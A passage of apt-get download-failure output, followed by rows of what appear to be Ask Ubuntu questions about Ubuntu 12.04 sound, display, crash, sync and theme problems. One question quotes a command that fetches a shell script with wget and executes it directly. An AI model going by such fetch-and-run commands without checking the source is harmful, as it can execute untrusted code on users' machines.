//archive.ubuntu.com/ubuntu/ precise-updates/main smbclient amd64 2:3.6.3-2ubuntu2.2 connection failed [ ip : 91.189.88.28 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main samba-common all 2:3.6.3-2ubuntu2.2 connection failed [ ip : 91.189.92.151 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main samba-common-bin amd64 2:3.6.3-2ubuntu2.2 connection failed [ ip : 91.189.92.153 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main simple-scan amd64 3.4.1-0ubuntu1.1 connection failed [ ip : 91.189.92.155 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main software-center all 5.2.2.2 connection failed [ ip : 91.189.92.176 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main software-properties-common all 0.82.7.1 connection failed [ ip : 91.189.92.179 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main software-properties-gtk all 0.82.7.1 connection failed [ ip : 91.189.92.181 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main ubuntuone-client-gnome amd64 3.0.1-0ubuntu1 connection failed [ ip : 91.189.92.183 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main unity-2d all 5.12.0-0ubuntu1 connection failed [ ip : 91.189.92.188 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main unity-greeter amd64 0.2.8-0ubuntu1.1 connection failed [ ip : 91.189.92.192 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main unity-lens-applications amd64 5.12.0-0ubuntu1 connection failed [ ip : 91.189.88.22 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main unity-lens-music amd64 5.12.0-0ubuntu1 connection failed [ ip : 91.189.88.25 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main unity-scope-musicstores amd64 5.12.0-0ubuntu1 connection failed [ ip : 91.189.88.28 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main vino amd64 3.4.2-0ubuntu1 connection failed [ ip : 91.189.92.151 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main xserver-xorg-input-synaptics amd64 1.6.0-0ubuntu1~precise1 connection failed [ ip : 91.189.92.153 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main xserver-xorg-video-vmware amd64 1:12.0.1-1ubuntu1.1 connection failed [ ip : 91.189.92.155 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main xul-ext-ubufox all 2.0.3-0ubuntu1 connection failed [ ip : 91.189.92.176 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main zeitgeist-core amd64 0.9.0-1ubuntu1 connection failed [ ip : 91.189.92.179 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main zeitgeist all 0.9.0-1ubuntu1 connection failed [ ip : 91.189.92.181 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main zenity amd64 3.4.0-0ubuntu4 connection failed [ ip : 91.189.92.183 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main zenity-common all 3.4.0-0ubuntu4 connection failed [ ip : 91.189.92.188 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main indicator-sound amd64 0.8.5.0-0ubuntu2.1 connection failed [ ip : 91.189.92.192 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main shotwell amd64 0.12.3-0ubuntu0.1 connection failed [ ip : 91.189.88.22 80 ] fetched 58.6 mb in 38min 14s ( 25.6 kb/s ) failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libr/libreoffice/libreoffice-draw_3.5.3-0ubuntu1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libr/libreoffice/libreoffice-gtk_3.5.3-0ubuntu1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libr/libreoffice/libreoffice-gnome_3.5.3-0ubuntu1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libr/libreoffice/python-uno_3.5.3-0ubuntu1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libr/libreoffice/libreoffice-math_3.5.3-0ubuntu1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libr/libreoffice/libreoffice-common_3.5.3-0ubuntu1_all.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libr/libreoffice/libreoffice-core_3.5.3-0ubuntu1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libr/libreoffice/fonts-opensymbol_102.2+libo3.5.3-0ubuntu1_all.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libr/libreoffice/libreoffice-style-human_3.5.3-0ubuntu1_all.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libr/libreoffice/libreoffice-style-tango_3.5.3-0ubuntu1_all.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/s/samba/libwbclient0_3.6.3-2ubuntu2.2_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/m/mesa/libxatracker1_8.0.2-0ubuntu3.1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/n/network-manager/libnm-util2_0.9.4.0-0ubuntu4.1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/n/network-manager/libnm-glib4_0.9.4.0-0ubuntu4.1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/n/network-manager/network-manager_0.9.4.0-0ubuntu4.1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/u/ubuntu-docs/ubuntu-docs_12.04.5_all.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/m/mesa/libglu1-mesa_8.0.2-0ubuntu3.1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.6.3-2ubuntu2.2_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/u/utouch-geis/libutouch-geis1_2.2.9-0ubuntu3_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gtk+3.0/gir1.2-gtk-3.0_3.4.2-0ubuntu0.2_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/u/ubuntu-sso-client/ubuntu-sso-client-gtk_3.0.0-0ubuntu2_all.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/u/ubuntu-sso-client/ubuntu-sso-client_3.0.0-0ubuntu2_all.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/u/ubuntu-sso-client/python-ubuntu-sso-client_3.0.0-0ubuntu2_all.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/l/lvm2/libdevmapper1.02.1_1.02.48-4ubuntu7.1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/l/lvm2/dmsetup_1.02.48-4ubuntu7.1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/v/vim/vim-tiny_7.3.429-2ubuntu2.1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/v/vim/vim-common_7.3.429-2ubuntu2.1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/h/hdparm/hdparm_9.37-0ubuntu3.1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/p/pygobject/python-gi-cairo_3.2.2-1~precise_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/p/pygobject/python-gi_3.2.2-1~precise_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/a/apport/python-problem-report_2.0.1-0ubuntu8_all.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/a/apport/python-apport_2.0.1-0ubuntu8_all.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/a/apport/apport_2.0.1-0ubuntu8_all.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/a/apport/apport-gtk_2.0.1-0ubuntu8_all.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/a/at-spi2-core/at-spi2-core_2.4.2-0ubuntu0.1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libu/libunity/libunity9_5.12.0-0ubuntu1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/n/nux/libnux-2.0-0_2.12.0-0ubuntu1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/n/nux/libnux-2.0-common_2.12.0-0ubuntu1_all.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/c/compiz/compiz-gnome_0.9.7.8-0ubuntu1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/c/compiz/compiz-plugins-default_0.9.7.8-0ubuntu1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/c/compiz/compiz-core_0.9.7.8-0ubuntu1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/u/unity/unity_5.12-0ubuntu1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/u/unity/libunity-core-5.0-5_5.12-0ubuntu1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/u/unity/unity-services_5.12-0ubuntu1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/u/unity/unity-common_5.12-0ubuntu1_all.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/n/nux/nux-tools_2.12.0-0ubuntu1_amd64.deb connection failed [ ip : 91.189.92.155 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/c/compiz/libdecoration0_0.9.7.8-0ubuntu1_amd64.deb connection failed [ ip : 91.189.92.176 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/c/compiz/compiz_0.9.7.8-0ubuntu1_all.deb connection failed [ ip : 91.189.92.179 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/e/evolution-data-server/libedataserver-1.2-15_3.2.3-0ubuntu7_amd64.deb connection failed [ ip : 91.189.92.181 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/e/evolution-data-server/libebackend-1.2-1_3.2.3-0ubuntu7_amd64.deb connection failed [ ip : 91.189.92.183 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/e/evolution-data-server/libecal-1.2-10_3.2.3-0ubuntu7_amd64.deb connection failed [ ip : 91.189.92.188 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/e/evolution-data-server/libedata-book-1.2-11_3.2.3-0ubuntu7_amd64.deb connection failed [ ip : 91.189.92.192 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/e/evolution-data-server/libedata-cal-1.2-13_3.2.3-0ubuntu7_amd64.deb connection failed [ ip : 91.189.88.22 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/e/evolution-data-server/evolution-data-server_3.2.3-0ubuntu7_amd64.deb connection failed [ ip : 91.189.88.25 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/e/evolution-data-server/evolution-data-server-common_3.2.3-0ubuntu7_all.deb connection failed [ ip : 91.189.88.28 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/e/evolution-data-server/libcamel-1.2-29_3.2.3-0ubuntu7_amd64.deb connection failed [ ip : 91.189.92.151 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/e/evolution-data-server/libebook-1.2-12_3.2.3-0ubuntu7_amd64.deb connection failed [ ip : 91.189.92.153 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/n/nautilus/libnautilus-extension1a_3.4.2-0ubuntu1_amd64.deb connection failed [ ip : 91.189.92.155 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libz/libzeitgeist/libzeitgeist-1.0-1_0.3.18-1ubuntu1_amd64.deb connection failed [ ip : 91.189.92.176 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/n/nautilus/nautilus-data_3.4.2-0ubuntu1_all.deb connection failed [ ip : 91.189.92.179 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/n/nautilus/nautilus_3.4.2-0ubuntu1_amd64.deb connection failed [ ip : 91.189.92.181 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/e/empathy/nautilus-sendto-empathy_3.4.2-0ubuntu1_amd64.deb connection failed [ ip : 91.189.92.183 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/e/empathy/empathy_3.4.2-0ubuntu1_amd64.deb connection failed [ ip : 91.189.92.188 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/e/empathy/empathy-common_3.4.2-0ubuntu1_all.deb connection failed [ ip : 91.189.92.192 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_7.4-2012.04-0ubuntu2_amd64.deb connection failed [ ip : 91.189.88.22 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/a/at-spi2-core/gir1.2-atspi-2.0_2.4.2-0ubuntu0.1_amd64.deb connection failed [ ip : 91.189.88.25 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gtksourceview3/gir1.2-gtksource-3.0_3.4.2-0ubuntu1_amd64.deb connection failed [ ip : 91.189.88.28 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libu/libubuntuone/libubuntuoneui-3.0-1_3.0.1-0ubuntu1_amd64.deb connection failed [ ip : 91.189.92.151 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libu/libubuntuone/gir1.2-ubuntuoneui-3.0_3.0.1-0ubuntu1_amd64.deb connection failed [ ip : 91.189.92.153 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libu/libunity/gir1.2-unity-5.0_5.12.0-0ubuntu1_amd64.deb connection failed [ ip : 91.189.92.155 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/glib-networking/glib-networking-services_2.32.1-1ubuntu1_amd64.deb connection failed [ ip : 91.189.92.176 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/glib-networking/glib-networking_2.32.1-1ubuntu1_amd64.deb connection failed [ ip : 91.189.92.179 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/glib-networking/glib-networking-common_2.32.1-1ubuntu1_all.deb connection failed [ ip : 91.189.92.181 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gnome-control-center/gnome-control-center-data_3.4.2-0ubuntu0.2_all.deb connection failed [ ip : 91.189.92.183 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gnome-settings-daemon/gnome-settings-daemon_3.4.1-0ubuntu1.1_amd64.deb connection failed [ ip : 91.189.92.188 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gnome-control-center/libgnome-control-center1_3.4.2-0ubuntu0.2_amd64.deb connection failed [ ip : 91.189.92.192 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gnome-control-center/gnome-control-center_3.4.2-0ubuntu0.2_amd64.deb connection failed [ ip : 91.189.88.22 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gnome-games/mahjongg_3.4.1-0ubuntu2_amd64.deb connection failed [ ip : 91.189.88.25 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gnome-games/gnomine_3.4.1-0ubuntu2_amd64.deb connection failed [ ip : 91.189.88.28 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gnome-games/gnome-sudoku_3.4.1-0ubuntu2_all.deb connection failed [ ip : 91.189.92.151 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gnome-games/gnome-games-data_3.4.1-0ubuntu2_all.deb connection failed [ ip : 91.189.92.153 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gnome-orca/gnome-orca_3.4.2-0ubuntu0.1_all.deb connection failed [ ip : 91.189.92.155 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/grub2/grub-pc_1.99-21ubuntu3.1_amd64.deb connection failed [ ip : 91.189.92.176 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/grub2/grub-pc-bin_1.99-21ubuntu3.1_amd64.deb connection failed [ ip : 91.189.92.179 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/grub2/grub2-common_1.99-21ubuntu3.1_amd64.deb connection failed [ ip : 91.189.92.181 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/grub2/grub-common_1.99-21ubuntu3.1_amd64.deb connection failed [ ip : 91.189.92.183 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gwibber/gwibber_3.4.1-0ubuntu1_amd64.deb connection failed [ ip : 91.189.92.188 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gwibber/gwibber-service_3.4.1-0ubuntu1_all.deb connection failed [ ip : 91.189.92.192 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gwibber/libgwibber2_3.4.1-0ubuntu1_amd64.deb connection failed [ ip : 91.189.88.22 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gwibber/libgwibber-gtk2_3.4.1-0ubuntu1_amd64.deb connection failed [ ip : 91.189.88.25 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gwibber/gwibber-service-facebook_3.4.1-0ubuntu1_all.deb connection failed [ ip : 91.189.88.28 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gwibber/gwibber-service-identica_3.4.1-0ubuntu1_all.deb connection failed [ ip : 91.189.92.151 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gwibber/gwibber-service-twitter_3.4.1-0ubuntu1_all.deb connection failed [ ip : 91.189.92.153 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/l/lvm2/libdevmapper-event1.02.1_1.02.48-4ubuntu7.1_amd64.deb connection failed [ ip : 91.189.92.155 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/e/evolution-data-server/libedataserverui-3.0-1_3.2.3-0ubuntu7_amd64.deb connection failed [ ip : 91.189.92.176 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/l/lvm2/liblvm2app2.2_2.02.66-4ubuntu7.1_amd64.deb connection failed [ ip : 91.189.92.179 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/n/network-manager/libnm-glib-vpn1_0.9.4.0-0ubuntu4.1_amd64.deb connection failed [ ip : 91.189.92.181 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libq/libqtbamf/libqtbamf1_0.2.4-0ubuntu1_amd64.deb connection failed [ ip : 91.189.92.183 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libr/libreoffice/libreoffice-emailmerge_3.5.3-0ubuntu1_all.deb connection failed [ ip : 91.189.92.188 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libr/libreoffice/libreoffice-help-en-us_3.5.3-0ubuntu1_all.deb connection failed [ ip : 91.189.92.192 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/u/unity-2d/unity-2d-shell_5.12.0-0ubuntu1_amd64.deb connection failed [ ip : 91.189.88.22 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/u/unity-2d/unity-2d-panel_5.12.0-0ubuntu1_amd64.deb connection failed [ ip : 91.189.88.25 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/u/unity-2d/unity-2d-spread_5.12.0-0ubuntu1_amd64.deb connection failed [ ip : 91.189.88.28 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/u/unity-2d/unity-2d-common_5.12.0-0ubuntu1_all.deb connection failed [ ip : 91.189.92.151 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/u/unity-2d/libunity-2d-private0_5.12.0-0ubuntu1_amd64.deb connection failed [ ip : 91.189.92.153 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_3.2.0-24.39_amd64.deb connection failed [ ip : 91.189.92.155 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/p/policykit-1/policykit-1_0.104-1ubuntu1_amd64.deb connection failed [ ip : 91.189.92.176 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/p/pygobject/python-gobject_3.2.2-1~precise_all.deb connection failed [ ip : 91.189.92.179 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/s/software-properties/python-software-properties_0.82.7.1_all.deb connection failed [ ip : 91.189.92.181 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/z/zeitgeist/python-zeitgeist_0.9.0-1ubuntu1_all.deb connection failed [ ip : 91.189.92.183 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/r/remmina/remmina-plugin-vnc_1.0.0-1ubuntu6_amd64.deb connection failed [ ip : 91.189.92.188 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/r/remmina/remmina-plugin-rdp_1.0.0-1ubuntu6_amd64.deb connection failed [ ip : 91.189.92.192 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/r/remmina/remmina_1.0.0-1ubuntu6_amd64.deb connection failed [ ip : 91.189.88.22 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/r/remmina/remmina-common_1.0.0-1ubuntu6_all.deb connection failed [ ip : 91.189.88.25 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.6.3-2ubuntu2.2_amd64.deb connection failed [ ip : 91.189.88.28 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.6.3-2ubuntu2.2_all.deb connection failed [ ip : 91.189.92.151 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/s/samba/samba-common-bin_3.6.3-2ubuntu2.2_amd64.deb connection failed [ ip : 91.189.92.153 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/s/simple-scan/simple-scan_3.4.1-0ubuntu1.1_amd64.deb connection failed [ ip : 91.189.92.155 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/s/software-center/software-center_5.2.2.2_all.deb connection failed [ ip : 91.189.92.176 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/s/software-properties/software-properties-common_0.82.7.1_all.deb connection failed [ ip : 91.189.92.179 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/s/software-properties/software-properties-gtk_0.82.7.1_all.deb connection failed [ ip : 91.189.92.181 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_12.0.1+build1-0ubuntu0.12.04.1_amd64.deb size mismatch failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-gnome-support_12.0.1+build1-0ubuntu0.12.04.1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/u/ubuntuone-client-gnome/ubuntuone-client-gnome_3.0.1-0ubuntu1_amd64.deb connection failed [ ip : 91.189.92.183 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/u/unity-2d/unity-2d_5.12.0-0ubuntu1_all.deb connection failed [ ip : 91.189.92.188 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/u/unity-greeter/unity-greeter_0.2.8-0ubuntu1.1_amd64.deb connection failed [ ip : 91.189.92.192 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/u/unity-lens-applications/unity-lens-applications_5.12.0-0ubuntu1_amd64.deb connection failed [ ip : 91.189.88.22 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/u/unity-lens-music/unity-lens-music_5.12.0-0ubuntu1_amd64.deb connection failed [ ip : 91.189.88.25 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/u/unity-lens-music/unity-scope-musicstores_5.12.0-0ubuntu1_amd64.deb connection failed [ ip : 91.189.88.28 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/u/update-manager/update-manager_0.156.14.4_all.deb size mismatch failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/u/update-manager/update-manager-core_0.156.14.4_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/v/vino/vino_3.4.2-0ubuntu1_amd64.deb connection failed [ ip : 91.189.92.151 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-input-synaptics/xserver-xorg-input-synaptics_1.6.0-0ubuntu1~precise1_amd64.deb connection failed [ ip : 91.189.92.153 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-vmware/xserver-xorg-video-vmware_12.0.1-1ubuntu1.1_amd64.deb connection fai
146363	no soundcard found 12.04 after kernel update	after newest kernel update i have lost my sound card . there is only sound via usb adapter . my headphones or speakers are working only through this device . the sound setting widget does n't show any sound card device beside usb . i have updated alsa driver from launchpad and also i have removed the ~./pulse directory , i have tried gnome-alsamixer ... but my sound card is just gone . i tred to find out if that is some hardware issue or if that is this unlucky kernel update . take a look on this output of : wget -o alsa-info.sh http : //www.alsa-project.org/alsa-info.sh & & chmod +x ./alsa-info.sh & & ./alsa-info.sh http : //www.alsa-project.org/db/ ? f=80c541c891c4bce51447c9d2f75ea7f9d8b678a4 here is the alsa-base.conf ( with included blacklist ) : http : //www.pasteall.org/32574 and output of : grep `` codec : '' /proc/asound/card*/codec* grep : /proc/asound/card*/codec* : no such file or directory what else can i provide to find out what 's wrong ?
146368	ibm thinkvision monitor not being detected by ubuntu 11.10 on lenovo thinkpad t400	i have a lenovo thinkpad t400 , connected to an ibm omniport dock . to this is connected my ibm thinkvision monitor , via dvi cable . my thinkpad is running ubuntu 11.10 . the monitor is not being detected , though it is on . i 'm a huge linux noob , so please do n't be too harsh . how do i fix this , or at least start diagnosing the problem ? edit : my video card is ati mobility radeon hd 3400 series . i have the proprietary driver disabled . when i go to `` additional drivers '' , i see `` ati/amd proprietary fglrx graphics driver '' and `` ati/amd proprietary fglrx graphics driver ( post-release updates ) '' , both disabled . when i enable the first one , nothing changes . when i try to enable the second one with the first one enabled , i get update failed . edit 2 : when i have the first driver enabled , and run sudo amdccle , i also get an error . this command does not work with the driver disabled . edit 3 : i forgot to mention this , but when i boot with windows on the same machine , the monitor works just fine ( via dvi ) . i think the problem was caused by the fact that i have 2 graphics cards - one integrated intel card and one ati card . i connected the external monitor via dvi port , which was likely associated to the ati card , which still has some issues ( i do n't know why , but would love to find out ) . i changed connectors and used vga , which resolved the issue . however , i would really like to get my ati radeon card working , since vga is really grainy compared to the dvi i get on windows .
146369	`` system program problem detected '' message being shown often and without apparent reason	i installed ubuntu 12.04 and for a couple of weeks i 've had no problems at all with the distribution . everything was perfect , but all of a sudden i started receiving the message `` system program problem detected '' in many occasions . this message pops up right after login and when i am using libreoffice and skype . this problems happens very often and the applications crash after the message . the strangest thing is that the message also appears when the computer is apparently `` doing nothing '' , with no applications being executed , which makes me think that the cause is some backgroud process . is this a general issue affecting many users ? is there anything i can do to solve this problem ?
146371	ubuntu one windows client 3.0.1 - sync not connecting	i 've got sync working at home on natty and i need to access files at work . i 've just installed client 3.0.1 at work on windows 7 . it 's finding my account and sees what devices are already set up for sync but it just repeatedly tries to sync ( file sync starting ... ) and after a while fails ( file sync is disconnected. ) . this cycle loops endlessly . i 'm suspicious that it 's a problem with my proxy setup . my employer does n't use a manual proxy configuration but instead uses an automatic configuration script at a specific http address . does u1 recognize that kind of setup or is it only looking for a proxy server in the form of an address/port ?
146372	how to install theme without using user-theme extension ?	i 'm using ubuntu 12.04 with gnome shell 3.4 . since day one i had some random crashes mainly after reloading or during search . after a lot of research i concluded that user-theme extension is to blame . only when disabled gnome shell runs 100 % smoothly . so my question is : is there a way to install a theme without using user-theme extension ? edit : trying to install it via gnome tweak tool without user-theme extension wo n't work because of [ this ] [ 1 ] .
146374	ibus icon is n't displayed correctly in gnome-shell	i 'm on ubuntu 12.04 with gnome 3 and i 'm using ibus to input vietnamese . the problem is after starting ibus , the ibus indicator vibrated for a while then the icon and its menu displayed somehow weird like the image below : http : //i48.servimg.com/u/f48/12/18/00/70/ibus10.jpg anyone help me please !
146375	remove only 1st page from a lot of pdf files	that 's all i have to do : remove only 1st page from a lot of pdf files ... please tell me that magic exists .
146377	downloading repository does n't work	i have a problem when i am downloading and trying to install few things eg : mtp-tools . it 's telling me that it 's going to add 265 k on my disk , i press yes and then it stays on waiting for headers ( i changed from main server to uk server , but it did n't make any difference ) . any idea guys ?
